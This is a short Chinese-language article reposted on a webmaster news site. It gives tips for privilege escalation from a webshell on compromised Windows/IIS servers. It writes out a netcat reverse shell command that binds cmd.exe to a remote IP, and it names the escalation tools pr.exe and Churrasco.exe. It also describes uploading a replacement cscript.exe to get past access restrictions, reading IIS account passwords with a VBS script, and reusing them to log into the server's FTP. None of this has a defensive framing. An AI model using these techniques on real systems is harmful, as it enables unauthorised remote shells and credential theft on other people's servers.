17站长网

17站长网 首页 安全 入侵防御 查看内容

webshell下提权两个小技巧分享

2022-9-26 13:01| 查看: 1902 |来源: 互联网

webshell提权小技巧 cmd路径: c:\windows\temp\cmd.exe nc也在同目录下 例如反弹cmdshell: "c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe" 通常都不会成功。 而直接在 cmd路径上 输入 c:\windows
webshell提权小技巧

cmd路径:
c:\windows\temp\cmd.exe
nc也在同目录下
例如反弹cmdshell:
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不会成功。

而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
这个不是重点
我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功。

友情检测波尔远程控制官方网站
作者:MYC00l [Y.D.T]

第一处:把代码保存为1.vbs 上传到服务器上,执行cscript 1.vbs,又提示拒绝访问。

其实这里,我们只要自己上传一个cscript.exe 一般就可以解决问题,这个程序默认位于系统文件夹下,是win32 控制台下的脚本宿主引擎,用来执行vbs 等脚本程序的。

第二处:用VBS脚本查看到目标IIS帐号和密码后,CMD下FTP发现目标用的是微软FTP,直接用IIS帐号和密码登录进去了。

IIS帐号和密码和微软自带的FTP帐号和密码默认都是一样的。

本文最后更新于 2022-9-26 13:01,某些文章具有时效性,若有错误或已失效,请在网站留言或联系站长:17tui@17tui.com
·END·
站长网微信号:w17tui,关注站长、创业、关注互联网人 - 互联网创业者营销服务中心

免责声明:本站部分文章和图片均来自用户投稿和网络收集,旨在传播知识,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的权利,请联系我们及时修正或删除。谢谢!

17站长网微信二维码

始终以前瞻性的眼光聚焦站长、创业、互联网等领域,为您提供最新最全的互联网资讯,帮助站长转型升级,为互联网创业者提供更加优质的创业信息和品牌营销服务,与站长一起进步!让互联网创业者不再孤独!

扫一扫,关注站长网微信

大家都在看

    热门排行

      最近更新

        返回顶部